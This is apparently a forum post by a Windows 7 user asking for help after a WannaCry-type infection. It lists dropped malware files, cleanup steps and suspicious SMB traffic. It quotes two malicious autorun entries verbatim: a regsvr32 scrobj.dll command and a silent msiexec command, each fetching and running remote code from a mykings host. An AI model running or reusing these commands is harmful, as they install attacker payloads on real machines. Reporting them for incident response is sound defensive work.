I do not know if this is the right place to post.
Yesterday my computer (Windows 7 HB x64 SP1) was subject to a massive virus attack.
The attack was contained by mostly the COMODO HIPS and probably by some of my countermeasures, but I still need to figure out how the viruses got into my computer and if everything of the malware has been removed.
In chronological order:
- At 17:56:40 a file "mssecsvc.exe" was created in the folder "C:\Windows".
Upon COMODO HIPS alert I terminated and deleted the file.
VirusTotal scan revealed that the file is Trojan / WanaCry / WannaCryptor RansomWare
After this the same file kept appearing in the same folder many times during several hours.
Each time I deleted the file and then after some minutes it reappeared.
- At 18:44:11 a file "c.bat" was created in the folder "C:\Windows\debug"
The same, upon HIPS alert I deleted the file.
VirusTotal did not find the file malignant at all, but Malwr scan revealed a lot of malicious activity.
- At 19:22:03 a file "ajtce.exe" was created in the folder "C:\Windows\Temp"
- At 19:22:35 a file "ocioq.exe" was created in the folder "C:\Windows\Temp"
Both of these files were identified as Trojan Droppers.
By this time I had scanned my computer with Malwarebytes and BitDefender Adware Removal Tool, but they did not find any problems.
Next I had found two new Auto Run entries:
1) Name: start
Command line: regsvr32 /u /s /i:http://js.mykings.top:280/v.sct scrobj.dll
Process Path: regsvr32 /u /s /i:http://js.mykings.top:280/v.sct scrobj.dll
2) Name: start1
Command line: msiexec.exe /i http://js.mykings.top:280/helloworld.msi /q
Product name: Windows Installer - Юникод
Process Path: C:\Windows\system32\msiexec.exe
- At 20:48:10 a file "Fwasf.exe" was created in the folder "C:\"
- At 21:53:24 a file "huazhongdiguo.exe" was created in the folder "C:\"
Both of these files were identified as Trojan Downloaders.
I deleted both Auto Run entries, downloaded the latest version of the RogueKiller. The scan did not find any substantial problems.
I rebooted the computer and did the Smart Scan with COMODO Cleaning Essentials - again no problems were found.
The file "mssecsvc.exe" kept reappearing in the folder "C:\Windows". Its actions were blocked by COMODO HIPS, but I kept deleting it every time I found it.
Other than that the computer worked normally.
By this time I have found a very suspicious activity of the SYSTEM process, namely it was trying to connect to other user's home computers in my ISP's network, among other places. The TCP connections were made from the ports 445 or 139 - characteristic of the WannaCry virus.
So it looked like some virus had hijacked my computer's SYSTEM process. Over a few hours SYSTEM had downloaded to my computer about 108 MB of some data and uploaded to somewhere in the Internet about 4.5 MB.
I blocked SYSTEM form connecting to the Internet with COMODO Firewall.
Since then no new viruses had appeared on my computer, so far, at least that I know of - there were no alerts.
I have been performing the complete scan with COMODO Cleaning Essentials but it is taking too long, so I will put it on pause. So far it is at 50% and has found no problems at all.
How can I find out how all these viruses got into my computer and if I had removed all of the malware?